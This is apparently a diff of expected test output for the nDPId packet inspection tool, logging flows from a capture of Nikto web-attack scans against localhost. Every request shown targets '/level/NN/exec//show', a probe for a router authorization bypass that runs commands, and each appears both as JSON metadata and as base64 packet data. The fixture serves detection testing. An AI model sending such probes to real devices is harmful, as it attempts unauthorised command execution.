{"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/43\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001290)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":592,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277627,"flow_last_seen":1576420277627,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277627,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50746,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":592,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":592,"flow_packet_id":1,"flow_last_seen":1576420277627,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277627,"pkt":"AAAAAAAAAAAAAAAACABFAADIYLhAAEAG23V\/AAABfwAAAcY6H5DQG1hJOevWU4AYAED+vAAAAQEICp1m\/qOdZv6iR0VUIC9sZXZlbC80NC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTEpDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":592,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277627,"flow_last_seen":1576420277627,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277627,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50746,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/44\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001291)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":592,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277627,"flow_last_seen":1576420277627,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277627,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50746,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/44\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001291)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":593,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277628,"flow_last_seen":1576420277628,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277628,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50748,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":593,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":593,"flow_packet_id":1,"flow_last_seen":1576420277628,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277628,"pkt":"AAAAAAAAAAAAAAAACABFAADID1ZAAEAGLNh\/AAABfwAAAcY8H5AV\/jesxRnzeoAYAED+vAAAAQEICp1m\/qSdZv6kR0VUIC9sZXZlbC80NS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjkyKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":593,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277628,"flow_last_seen":1576420277628,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277628,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50748,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/45\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001292)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":593,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277628,"flow_last_seen":1576420277628,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277628,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50748,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/45\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001292)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":594,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277630,"flow_last_seen":1576420277630,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277630,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50750,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":594,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":594,"flow_packet_id":1,"flow_last_seen":1576420277630,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277630,"pkt":"AAAAAAAAAAAAAAAACABFAADI0WBAAEAGas1\/AAABfwAAAcY+H5DCTOmi+t3hCIAYAED+vAAAAQEICp1m\/qWdZv6lR0VUIC9sZXZlbC80Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjkzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277630,"flow_last_seen":1576420277630,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277630,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50750,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/46\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001293)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277630,"flow_last_seen":1576420277630,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277630,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50750,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/46\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001293)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":595,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277631,"flow_last_seen":1576420277631,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277631,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50752,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":595,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":595,"flow_packet_id":1,"flow_last_seen":1576420277631,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277631,"pkt":"AAAAAAAAAAAAAAAACABFAADIlpVAAEAGpZh\/AAABfwAAAcZAH5Cryq5teKvsJoAYAED+vAAAAQEICp1m\/qedZv6nR0VUIC9sZXZlbC80Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTQpDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":595,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277631,"flow_last_seen":1576420277631,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277631,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50752,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/47\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001294)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":595,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277631,"flow_last_seen":1576420277631,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277631,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50752,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/47\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001294)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":596,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277633,"flow_last_seen":1576420277633,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277633,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50754,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":596,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":596,"flow_packet_id":1,"flow_last_seen":1576420277633,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277633,"pkt":"AAAAAAAAAAAAAAAACABFAADIENVAAEAGK1l\/AAABfwAAAcZCH5APvynUeLRgIoAYAED+vAAAAQEICp1m\/qmdZv6oR0VUIC9sZXZlbC80OC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjk1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":596,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277633,"flow_last_seen":1576420277633,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277633,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50754,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/48\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001295)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":596,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277633,"flow_last_seen":1576420277633,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277633,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50754,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/48\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001295)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":597,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277637,"flow_last_seen":1576420277637,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277637,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50756,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":597,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":597,"flow_packet_id":1,"flow_last_seen":1576420277637,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277637,"pkt":"AAAAAAAAAAAAAAAACABFAADIJlxAAEAGFdJ\/AAABfwAAAcZEH5CFHB9c3vOX2IAYAED+vAAAAQEICp1m\/q2dZv6tR0VUIC9sZXZlbC80OS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":597,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277637,"flow_last_seen":1576420277637,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277637,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50756,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/49\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001296)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":597,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277637,"flow_last_seen":1576420277637,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277637,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50756,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/49\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001296)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":598,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277639,"flow_last_seen":1576420277639,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277639,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50758,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":598,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":598,"flow_packet_id":1,"flow_last_seen":1576420277639,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277639,"pkt":"AAAAAAAAAAAAAAAACABFAADIZI9AAEAG155\/AAABfwAAAcZGH5DAl12NotXkTIAYAED+vAAAAQEICp1m\/q+dZv6vR0VUIC9sZXZlbC81MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":598,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277639,"flow_last_seen":1576420277639,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277639,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50758,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/50\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001297)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":598,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277639,"flow_last_seen":1576420277639,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277639,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50758,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/50\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001297)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":599,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277642,"flow_last_seen":1576420277642,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277642,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50760,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":599,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":599,"flow_packet_id":1,"flow_last_seen":1576420277642,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277642,"pkt":"AAAAAAAAAAAAAAAACABFAADIuMhAAEAGg2V\/AAABfwAAAcZIH5DuPYHFtiFXooAYAED+vAAAAQEICp1m\/rKdZv6yR0VUIC9sZXZlbC81MS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjk4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":599,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277642,"flow_last_seen":1576420277642,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277642,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50760,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/51\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 